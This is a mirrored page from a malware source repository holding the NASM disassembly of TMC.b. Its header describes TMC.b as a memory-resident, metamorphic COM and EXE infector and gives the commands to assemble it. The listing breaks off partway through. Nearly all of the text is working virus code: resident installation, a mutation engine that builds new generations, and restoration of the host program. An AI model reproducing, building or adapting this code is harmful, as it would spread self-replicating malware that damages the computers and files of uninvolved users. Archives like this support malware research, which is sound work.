mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
4285 lines
174 KiB
NASM
4285 lines
174 KiB
NASM
|
comment *
|
|||
|
TMC.b <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
Disassembly by <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
Super/29A and Darkman/29A <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
TMC.b is a 4780 bytes resident appending COM and EXE virus. Infects at load
|
|||
|
and/or execute program, rename file and open file. TMC.b has an error
|
|||
|
handler, retro structures and is metamorphic in file and memory using Tiny
|
|||
|
Mutation Compiler v 1.00 [TMC].
|
|||
|
|
|||
|
To compile TMC.b with Turbo Assembler v 5.0 type:
|
|||
|
TASM /M TMC_B.ASM
|
|||
|
TLINK /x TMC_B.OBJ
|
|||
|
EXE2BIN TMC_B.EXE TMC_B.COM
|
|||
|
*
|
|||
|
|
|||
|
.model tiny
|
|||
|
.code
|
|||
|
|
|||
|
code_begin:
|
|||
|
mov bp,100h ; BP = delta offset
|
|||
|
|
|||
|
cld ; Clear direction flag
|
|||
|
mov ax,ds ; AX = segment of PSP for current ...
|
|||
|
mov [bp+program_seg],ax ; Store segment of PSP for current...
|
|||
|
|
|||
|
dec ax ; AX = segment of current Memory C...
|
|||
|
mov ds,ax ; DS = segment of current Memory C...
|
|||
|
mov ax,ds:[03h] ; AX = size of memory block in par...
|
|||
|
|
|||
|
cmp ax,1900h ; Insufficient memory?
|
|||
|
jae resize_mem ; Above or equal? Jump to resize_mem
|
|||
|
|
|||
|
jmp terminate
|
|||
|
resize_mem:
|
|||
|
push cs ; Save CS at stack
|
|||
|
pop ds ; Load DS from stack (CS)
|
|||
|
|
|||
|
mov [bp+mcb_size_],ax ; Store size of memory block in p...
|
|||
|
|
|||
|
mov bx,[bp+new_mcb_size]
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
int 21h
|
|||
|
jnc allocate_mem ; No error? Jump to allocate_mem
|
|||
|
|
|||
|
jmp terminate
|
|||
|
allocate_mem:
|
|||
|
mov ah,48h ; Allocate memory
|
|||
|
|
|||
|
mov bx,[bp+mcb_size_] ; BX = size of memory block in par...
|
|||
|
sub bx,[bp+new_mcb_size]
|
|||
|
dec bx ; BX = number of paragraphs to all...
|
|||
|
cmp bx,0c00h ; Insufficient memory?
|
|||
|
jae allocat_mem ; Above or equal? Jump to allocat_...
|
|||
|
|
|||
|
jmp terminate
|
|||
|
allocat_mem:
|
|||
|
int 21h
|
|||
|
jnc initiali_tmc ; No error? Jump to initiali_tmc
|
|||
|
|
|||
|
jmp terminate
|
|||
|
initiali_tmc:
|
|||
|
mov es,ax ; ES = segment of allocated memory
|
|||
|
mov es:[01h],0deadh ; Store 16-bit random number
|
|||
|
mov word ptr es:[0ch],00h
|
|||
|
mov es:[04h],1000h ; Store offset of block information
|
|||
|
mov es:[06h],2000h ; Store offset of CALL; JMP; Jcc i...
|
|||
|
mov es:[08h],3000h ; Store offset of data information
|
|||
|
|
|||
|
lea si,[bp+tmc_table] ; SI = offset of tmc_table
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
|
|||
|
mov bx,4000h ; BX = offset of next virus genera...
|
|||
|
|
|||
|
jmp initial_tmc
|
|||
|
initial_tmc:
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
xor ax,ax ; Zero AX
|
|||
|
|
|||
|
jmp tmc_ini_loop
|
|||
|
tmc_ini_loop:
|
|||
|
add si,ax ; SI = offset of block or instruct...
|
|||
|
call decrypt_byte
|
|||
|
or al,al ; End of table?
|
|||
|
jz calc_blocks ; Zero? Jump to calc_blocks
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
|
|||
|
jae exam_block ; Above or equal? Jump to exam_block
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
cmp al,10h ; Data?
|
|||
|
jbe tmc_ini_loop ; Below or equal? Jump to tmc_ini_...
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
sub al,10h ; AL = length of data
|
|||
|
|
|||
|
jmp tmc_ini_loop
|
|||
|
exam_block:
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
jne exam_block_ ; Not equal? Jump to exam_block_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov al,00h ; Don't add anything to offset wit...
|
|||
|
|
|||
|
jmp tmc_ini_loop
|
|||
|
exam_block_:
|
|||
|
cmp al,11101110b ; Beginning of block?
|
|||
|
jne next_byte ; Not equal? Jump to next_byte
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov ax,si ; AX = offset of block identification
|
|||
|
dec ax ; AX = offset of block within table
|
|||
|
stosw ; Store offset of block within table
|
|||
|
|
|||
|
mov ax,0ffffh ; Block is still in one part
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
mov ax,02h ; Add two to offset within table
|
|||
|
|
|||
|
jmp tmc_ini_loop
|
|||
|
next_byte:
|
|||
|
mov al,02h ; Add two to offset within table
|
|||
|
|
|||
|
jmp tmc_ini_loop
|
|||
|
calc_blocks:
|
|||
|
lea ax,[di-10h] ; AX = number of blocks multiplied...
|
|||
|
shr ax,01h ; Divide number of blocks by two
|
|||
|
shr ax,01h ; Divide number of blocks by two
|
|||
|
mov es:[0ah],ax ; Store number of blocks
|
|||
|
|
|||
|
xor ax,ax ; End of table
|
|||
|
stosw ; Store end of table
|
|||
|
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
mov si,es:[di] ; SI = offset of block within table
|
|||
|
|
|||
|
jmp exam_bloc
|
|||
|
split_block:
|
|||
|
push bp ; Save BP at stack
|
|||
|
mov bp,es:[0ah] ; BP = number of blocks
|
|||
|
call rnd_in_range
|
|||
|
pop bp ; Load BP from stack
|
|||
|
|
|||
|
shl ax,01h ; Multiply random number with two
|
|||
|
shl ax,01h ; Multiply random number with two
|
|||
|
add ax,10h ; Add ten to random number
|
|||
|
|
|||
|
mov di,ax ; DI = random offset within table
|
|||
|
|
|||
|
jmp exam_nxt_blo
|
|||
|
exam_nxt_blo:
|
|||
|
add di,04h ; DI = offset of next offset withi...
|
|||
|
|
|||
|
mov si,es:[di] ; SI = offset of next block within...
|
|||
|
or si,si ; End of table?
|
|||
|
jnz exam_block__ ; Not zero? Jump to exam_block__
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov di,10h ; DI = offset of table of blocks
|
|||
|
mov si,es:[di] ; SI = offset of block within table
|
|||
|
|
|||
|
jmp exam_block__
|
|||
|
exam_block__:
|
|||
|
push ax ; Save AX at stack
|
|||
|
call decrypt_byte
|
|||
|
dec si ; Decrease offset of block within ...
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
pop ax ; Load AX from stack
|
|||
|
jne exam_bloc ; Not equal? Jump to exam_bloc
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
cmp di,ax ; End of table of blocks?
|
|||
|
jne exam_nxt_blo ; Not equal? Jump to exam_nxt_blo
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
jmp exam_tbl_inf
|
|||
|
exam_bloc:
|
|||
|
mov ax,es:[di+02h] ; AX = block information
|
|||
|
|
|||
|
cmp ax,0ffffh ; Block is still in one part?
|
|||
|
je exam_bloc_ ; Equal? Jump to exam_bloc_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
mov di,ax ; DI = offset of end of first part...
|
|||
|
mov al,11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
stosb ; Store JMP imm16
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
sub ax,di ; Subtract offset of end of first ...
|
|||
|
stosw ; Store 16-bit immediate
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
jmp exam_bloc_
|
|||
|
exam_bloc_:
|
|||
|
call decrypt_byte
|
|||
|
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
jne exam_bloc__ ; Not equal? Jump to exam_bloc__
|
|||
|
|
|||
|
jmp end_of_block
|
|||
|
exam_bloc__:
|
|||
|
cmp al,10h ; Data; CALL; JMP; Data reference...?
|
|||
|
ja exam_bloc___ ; Above? Jump to exam_bloc___
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push ax bp ; Save registers at stack
|
|||
|
mov bp,[bp+probability] ; BP = probability
|
|||
|
call rnd_in_range
|
|||
|
or ax,ax ; Split up block?
|
|||
|
pop bp ax ; Load registers from stack
|
|||
|
jz split_block ; Zero? Jump to split_block_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
jmp exam_bloc___
|
|||
|
exam_bloc___:
|
|||
|
cmp al,11101111b ; End of block?
|
|||
|
jne exam_blo ; Not equal? Jump to exam_blo
|
|||
|
|
|||
|
jmp end_of_block
|
|||
|
exam_blo:
|
|||
|
cmp al,11101000b ; CALL; JMP; Data reference; Jcc?
|
|||
|
jae exam_data ; Above or equal? Jump to exam_data
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
cmp al,10h ; Data?
|
|||
|
jbe sto_instruct ; Below or equal? Jump to sto_inst...
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
sub al,10h ; AL = length of data
|
|||
|
|
|||
|
jmp sto_instruct
|
|||
|
sto_instruct:
|
|||
|
xor cx,cx ; Zero CX
|
|||
|
mov cl,al ; CL = length of instruction
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
mov di,bx ; DI = offset within next virus ge...
|
|||
|
|
|||
|
jmp sto_ins_loop
|
|||
|
sto_ins_loop:
|
|||
|
call decrypt_byte
|
|||
|
stosb ; Store byte of instruction
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
jnz sto_ins_loop ; Not zero? Jump to sto_ins_loop
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov bx,di ; BX = offset within next virus ge...
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
jmp exam_bloc_
|
|||
|
exam_data:
|
|||
|
cmp al,11101101b ; Data reference?
|
|||
|
jne exam_blo_ ; Not equal? Jump to exam_blo_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
mov di,es:[08h] ; DI = offset within data information
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
dec ax ; Decrease offset within next viru...
|
|||
|
stosw ; Store offset within next virus g...
|
|||
|
|
|||
|
call decrypt_id
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
mov es:[08h],di ; Store offset within data informa...
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
jmp exam_bloc_
|
|||
|
exam_blo_:
|
|||
|
cmp al,11101110b ; Beginning of block?
|
|||
|
jne sto_call_jmp ; Not equal? Jump to sto_call_jmp
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push di ; Save DI at stack
|
|||
|
mov di,es:[04h] ; DI = offset within block informa...
|
|||
|
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
stosw ; Store offset within next virus ge...
|
|||
|
|
|||
|
call decrypt_id
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
mov es:[04h],di ; Store offset within block inform...
|
|||
|
|
|||
|
cmp ax,4c5h ; Block identification of tmc_table?
|
|||
|
jne exam_message ; Not equal? Jump to exam_message
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push si ; Save SI at stack
|
|||
|
mov di,bx ; DI = offset within next virus ge...
|
|||
|
lea si,[bp+tmc_table] ; SI = offset of tmc_table
|
|||
|
mov cx,(table_end-table_begin)
|
|||
|
rep movsb ; Move table to top of memory
|
|||
|
|
|||
|
mov bx,di ; BX = offset within next virus ge...
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
jmp examine_next
|
|||
|
exam_message:
|
|||
|
cmp ax,2328h ; Block identification of message?
|
|||
|
jne exam_probabi ; Not equal? Jump to exam_probabi
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov ax,14h ; Probability of including message
|
|||
|
cmp [bp+probability],ax ; Include message?
|
|||
|
jae examine_next ; Above or equal? Jump to examine_...
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
call decrypt_byte
|
|||
|
sub al,10h ; AL = length of message
|
|||
|
mov ah,00h ; Zero AH
|
|||
|
add si,ax ; SI = offset of end of message
|
|||
|
|
|||
|
jmp examine_next
|
|||
|
exam_probabi:
|
|||
|
cmp ax,0bech ; Block identification of probabi...?
|
|||
|
jne examine_next ; Not equal? Jump to examine_next
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov ax,[bp+probability] ; AX = probability
|
|||
|
dec ax ; Decrease probability
|
|||
|
cmp ax,05h ; Probability too small?
|
|||
|
jae store_probab ; Above or equal? Jump to store_pr...
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov ax,64h ; Reset probability
|
|||
|
|
|||
|
jmp store_probab
|
|||
|
store_probab:
|
|||
|
mov es:[bx],ax ; Store probability
|
|||
|
|
|||
|
add bx,02h ; Add two to offset within next vi...
|
|||
|
add si,03h ; SI = offset of beginning of next...
|
|||
|
|
|||
|
jmp examine_next
|
|||
|
examine_next:
|
|||
|
pop di ; Load DI from stack
|
|||
|
|
|||
|
call decrypt_byte
|
|||
|
|
|||
|
jmp exam_bloc___
|
|||
|
sto_call_jmp:
|
|||
|
push ax di ; Save registers at stack
|
|||
|
mov di,es:[06h] ; DI = offset within CALL; JMP; Jc...
|
|||
|
mov ax,bx ; AX = offset within next virus ge...
|
|||
|
stosw ; Store offset within next virus g...
|
|||
|
|
|||
|
call decrypt_id
|
|||
|
stosw ; Store block identification
|
|||
|
|
|||
|
mov es:[06h],di ; Store offset within CALL; JMP; J...
|
|||
|
pop di ax ; Load registers from stack
|
|||
|
|
|||
|
mov es:[bx],al ; Store CALL imm16; JMP imm16; Jcc...
|
|||
|
|
|||
|
add bx,03h ; Add three to offset within next ...
|
|||
|
|
|||
|
cmp al,11110000b ; Jump condition?
|
|||
|
jae jcc_imm8 ; Above or equal? Jump to jcc_imm8
|
|||
|
|
|||
|
jmp exam_bloc_
|
|||
|
jcc_imm8:
|
|||
|
inc bx ; Increase offset within next viru...
|
|||
|
inc bx ; Increase offset within next viru...
|
|||
|
|
|||
|
jmp exam_bloc_
|
|||
|
split_block_:
|
|||
|
mov es:[di+02h],bx ; Store offset within next virus g...
|
|||
|
|
|||
|
add bx,03h ; Add three to offset within next ...
|
|||
|
|
|||
|
jmp end_of_block
|
|||
|
end_of_block:
|
|||
|
dec si ; Decrease offset of block within ...
|
|||
|
|
|||
|
mov es:[di],si ; Store offset of block within table
|
|||
|
|
|||
|
jmp split_block
|
|||
|
exam_tbl_inf:
|
|||
|
cmp word ptr es:[0ch],00h
|
|||
|
jne correct_i16 ; End of second table? Jump to cor...
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
pop si ; Load SI from stack
|
|||
|
|
|||
|
mov es:[0ch],bx ; Store offset within next virus g...
|
|||
|
|
|||
|
add si,(second_table-first_table)
|
|||
|
|
|||
|
jmp initial_tmc
|
|||
|
correct_i16:
|
|||
|
push es ; Save ES at stack
|
|||
|
pop ds ; Load DS from stack (ES)
|
|||
|
|
|||
|
sub bx,4000h ; Subtract offset of next virus ge...
|
|||
|
mov ds:[0eh],bx ; Store length of virus
|
|||
|
|
|||
|
mov si,2000h ; SI = offset of CALL; JMP; Jcc im...
|
|||
|
mov cx,ds:[06h] ; CX = offset of end of CALL; JMP;...
|
|||
|
sub cx,si ; Subtract offset of CALL; JMP; Jc...
|
|||
|
|
|||
|
shr cx,01h ; Divide number of CALL imm16; JMP...
|
|||
|
shr cx,01h ; Divide number of CALL imm16; JMP...
|
|||
|
|
|||
|
jmp jmp_call_loo
|
|||
|
jmp_call_loo:
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
push cx si ; Save registers at stack
|
|||
|
mov si,1000h ; SI = offset of block information
|
|||
|
mov cx,ds:[04h] ; CX = offset of end of block info...
|
|||
|
sub cx,si ; Subtract offset of block informa...
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
jmp find_block
|
|||
|
find_block:
|
|||
|
cmp ax,[si+02h] ; Found block?
|
|||
|
je found_block ; Equal? Jump to found_block
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
add si,04h ; SI = offset of next block in table
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
jnz find_block ; Not zero? Jump to find_block
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
found_block:
|
|||
|
mov dx,[si] ; DX = offset of block
|
|||
|
|
|||
|
pop si cx ; Load registers from stack
|
|||
|
pop bx ; Load BX from stack (AX)
|
|||
|
|
|||
|
mov al,[bx] ; AL = first byte of instruction
|
|||
|
cmp al,11110000b ; Jump condition?
|
|||
|
jb sto_call_jm ; Below? Jump to sto_call_jm
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
sub byte ptr [bx],10000000b
|
|||
|
|
|||
|
inc bx ; BX = offset of 8-bit immediate
|
|||
|
|
|||
|
push dx ; Save DX at stack
|
|||
|
sub dx,bx ; Subtract offset within next viru...
|
|||
|
dec dx ; Decrease 8-bit immediate
|
|||
|
|
|||
|
cmp dx,7fh ; 8-bit immediate out of range?
|
|||
|
jg invert_jcc ; Greater? Jump to invert_jcc
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
cmp dx,0ff80h ; 8-bit immediate out of range?
|
|||
|
jl invert_jcc ; Less? Jump to invert_jcc
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov [bx],dl ; Store 8-bit immediate
|
|||
|
inc bx ; BX = offset of end of Jcc imm8
|
|||
|
|
|||
|
mov [bx],1001000010010000b
|
|||
|
mov byte ptr [bx+02h],10010000b
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
jmp correct_i16_
|
|||
|
invert_jcc:
|
|||
|
pop dx ; Load DX from stack
|
|||
|
|
|||
|
dec bx ; BX = offset of Jcc imm8
|
|||
|
xor byte ptr [bx],00000001b
|
|||
|
|
|||
|
inc bx ; BX = offset of 8-bit immediate
|
|||
|
mov byte ptr [bx],03h ; Store 8-bit immediate
|
|||
|
|
|||
|
inc bx ; BX = offset of JMP imm16
|
|||
|
mov al,11101001b ; JMP imm16 (opcode 0e9h)
|
|||
|
|
|||
|
jmp sto_call_jm
|
|||
|
sto_call_jm:
|
|||
|
mov [bx],al ; Store CALL imm16; JMP imm16
|
|||
|
|
|||
|
inc bx ; BX = offset of 16-bit immediate
|
|||
|
sub dx,bx ; Subtract offset within next viru...
|
|||
|
|
|||
|
dec dx ; Decrease 16-bit immediate
|
|||
|
dec dx ; Decrease 16-bit immediate
|
|||
|
|
|||
|
mov [bx],dx ; Store 16-bit immediate
|
|||
|
|
|||
|
jmp correct_i16_
|
|||
|
correct_i16_:
|
|||
|
dec cx ; Decrease counter
|
|||
|
jnz jmp_call_loo ; Not zero? Jump to jmp_call_loo
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
mov si,3000h ; SI = offset of data information
|
|||
|
mov cx,ds:[08h] ; CX = offset of end of data infor...
|
|||
|
sub cx,si ; Subtract offset of data informat...
|
|||
|
|
|||
|
shr cx,01h ; Divide number of data references...
|
|||
|
shr cx,01h ; Divide number of data references...
|
|||
|
|
|||
|
jmp data_ref_loo
|
|||
|
data_ref_loo:
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
push ax ; Save AX at stack
|
|||
|
|
|||
|
lodsw ; AX = offset of block within data...
|
|||
|
|
|||
|
push cx si ; Save registers at stack
|
|||
|
mov si,1000h ; SI = offset of block information
|
|||
|
mov cx,ds:[04h] ; CX = offset of end of block info...
|
|||
|
sub cx,si ; Subtract offset of block informa...
|
|||
|
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
shr cx,01h ; Divide number of block by two
|
|||
|
|
|||
|
jmp find_block_
|
|||
|
find_block_:
|
|||
|
cmp ax,[si+02h] ; Found block?
|
|||
|
je found_block_ ; Equal? Jump to found_block_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
add si,04h ; SI = offset of next block in table
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
jnz find_block_ ; Not zero? Jump to find_block_
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
found_block_:
|
|||
|
mov ax,[si] ; AX = offset of block
|
|||
|
pop si cx ; Load registers from stack
|
|||
|
pop bx ; Load BX from stack (AX)
|
|||
|
|
|||
|
sub ax,4000h ; Subtract offset of next virus ge...
|
|||
|
mov [bx],ax ; Store 16-bit immediate
|
|||
|
|
|||
|
dec cx ; Decrease counter
|
|||
|
jnz data_ref_loo ; Not zero? Jump to data_ref_loo
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
jmp restore_code
|
|||
|
restore_code:
|
|||
|
mov ax,[bp+program_seg] ; AX = segment of PSP for current ...
|
|||
|
|
|||
|
mov cx,[bp+initial_ss] ; CX = initial SS relative to star...
|
|||
|
add cx,10h ; Add ten to initial SS relative t...
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
push [bp+initial_sp] ; Save initial SP at stack
|
|||
|
|
|||
|
mov cx,[bp+initial_cs] ; CX = initial CS relative to star...
|
|||
|
add cx,10h ; Add ten to initial CS relative t...
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
push [bp+initial_ip] ; Save initial IP at stack
|
|||
|
|
|||
|
push ax ; Save segment of PSP for current ...
|
|||
|
push [bp+mcb_size] ; Save size of memory block in par...
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
mov cl,00h ; COM executable
|
|||
|
cmp [bp+executa_stat],cl
|
|||
|
jne move_virus ; COM executable? Jump to move_virus
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
lea si,[bp+origin_code] ; SI = offset of origin_code
|
|||
|
|
|||
|
mov ax,cs:[si] ; AX = first two bytes of original...
|
|||
|
mov cs:[100h],ax ; Store first two bytes of origina...
|
|||
|
|
|||
|
mov al,cs:[si+02h] ; AL = last byte of original code ...
|
|||
|
mov cs:[100h+02h],al ; Store last byte of original code...
|
|||
|
|
|||
|
jmp move_virus
|
|||
|
|
|||
|
mov ax,[bp+program_seg] ; AX = segment of PSP for current ...
|
|||
|
|
|||
|
mov cx,[bp+initial_ss] ; CX = initial SS relative to star...
|
|||
|
add cx,10h ; Add ten to initial SS relative t...
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
push [bp+initial_sp] ; Save initial SP at stack
|
|||
|
|
|||
|
mov cx,[bp+initial_cs] ; CX = initial CS relative to star...
|
|||
|
add cx,10h ; Add ten to initial CS relative t...
|
|||
|
add cx,ax ; Add segment of PSP for current p...
|
|||
|
push cx ; Save CX at stack
|
|||
|
|
|||
|
push [bp+incorrect_ip] ; Save incorrect IP at stack
|
|||
|
|
|||
|
push ax ; Save segment of PSP for current ...
|
|||
|
push [bp+mcb_size] ; Save size of memory block in par...
|
|||
|
push ds ; Save DS at stack
|
|||
|
|
|||
|
mov cl,00h ; COM executable
|
|||
|
cmp [bp+executa_stat],cl
|
|||
|
jne move_virus ; COM executable? Jump to move_virus
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
lea si,[bp+origin_code] ; SI = offset of origin_code
|
|||
|
|
|||
|
mov ax,cs:[si] ; AX = first two bytes of original...
|
|||
|
mov cs:[100h],ax ; Store first two bytes of origina...
|
|||
|
|
|||
|
mov al,cs:[si+02h] ; AL = last byte of original code ...
|
|||
|
mov cs:[100h+02h],al ; Store last byte of original code...
|
|||
|
|
|||
|
jmp move_virus
|
|||
|
move_virus:
|
|||
|
xor ax,ax ; Zero AX
|
|||
|
mov ds,ax ; DS = segment of DOS communicatio...
|
|||
|
|
|||
|
cmp byte ptr ds:[501h],10h
|
|||
|
jne move_virus_ ; Already resident? Jump to move_v...
|
|||
|
|
|||
|
jmp virus_exit
|
|||
|
move_virus_:
|
|||
|
mov byte ptr ds:[501h],10h
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
pop ds ; Load DS from stack (ES)
|
|||
|
|
|||
|
mov ax,ds:[0ch] ; AX = offset within next virus ge...
|
|||
|
sub ax,4000h ; Subtract offset of next virus ge...
|
|||
|
mov [bp+vir_exit_off],ax
|
|||
|
|
|||
|
mov cx,ds:[0eh] ; CX = length of virus
|
|||
|
mov [bp+virus_length],cx
|
|||
|
|
|||
|
mov si,4000h ; SI = offset of next virus genera...
|
|||
|
xor di,di ; Zero DI
|
|||
|
rep movsb ; Move virus to top of memory
|
|||
|
|
|||
|
mov cl,04h ; Divide by paragraphs
|
|||
|
shr di,cl ; DI = length of next virus genera...
|
|||
|
inc di ; Increase length of next virus ge...
|
|||
|
|
|||
|
mov bx,[bp+mcb_size_] ; BX = size of memory block in par...
|
|||
|
sub bx,[bp+new_mcb_size]
|
|||
|
sub bx,di ; Subtract length of next virus ge...
|
|||
|
|
|||
|
dec bx ; Decrease new size in paragraphs
|
|||
|
dec bx ; Decrease new size in paragraphs
|
|||
|
|
|||
|
cmp bx,di ; Insufficient memory?
|
|||
|
jae resize_mem_ ; Above or equal? Jump to resize_mem_
|
|||
|
|
|||
|
jmp virus_exit
|
|||
|
resize_mem_:
|
|||
|
mov ah,4ah ; Resize memory block
|
|||
|
int 21h
|
|||
|
jnc allocat_mem_ ; No error? Jump to allocat_mem_
|
|||
|
|
|||
|
jmp virus_exit
|
|||
|
allocat_mem_:
|
|||
|
mov bx,di ; BX = number of paragraphs to all...
|
|||
|
mov ah,48h ; Allocate memory
|
|||
|
int 21h
|
|||
|
jc virus_exit ; Error? Jump to virus_exit
|
|||
|
nop
|
|||
|
nop
|
|||
|
nop
|
|||
|
|
|||
|
push ax ; Save AX at stack
|
|||
|
dec ax ; AX = segment of current Memory C...
|
|||
|
mov es,ax ; ES = segment of current Memory C...
|
|||
|
mov word ptr es:[01h],08h
|
|||
|
pop es ; Load ES from stack (AX)
|
|||
|
|
|||
|
mov cx,[bp+virus_length]
|
|||
|
xor si,si ; Zero SI
|
|||
|
xor di,di ; Zero DI
|
|||
|
rep movsb ; Move virus to top of memory
|
|||
|
|
|||
|
push es ; Save ES at stack
|
|||
|
push word ptr [bp+vir_exit_off]
|
|||
|
|
|||
|
mov al,[bp+crypt_key] ; AL = 8-bit encryption/decryption...
|
|||
|
mov ah,byte ptr [bp+sliding_key]
|
|||
|
|
|||
|
retf ; Return far
|
|||
|
terminate:
|
|||
|
mov ax,4c00h ; Terminate with return code
|
|||
|
int 21h
|
|||
|
|
|||
|
get_rnd_num proc near ; Get 16-bit random number
|
|||
|
push cx ; Save CX at stack
|
|||
|
in al,40h ; AL = 8-bit random number
|
|||
|
mov ah,al ; AH = 8-bit random number
|
|||
|
in al,40h ; AL = 8-bit random number
|
|||
|
|
|||
|
xor ax,es:[01h] ; AX = 16-bit random number
|
|||
|
|
|||
|
mov cl,ah ; CL = high-order byte of 16-bit r...
|
|||
|
rol ax,cl ; AX = 16-bit random number
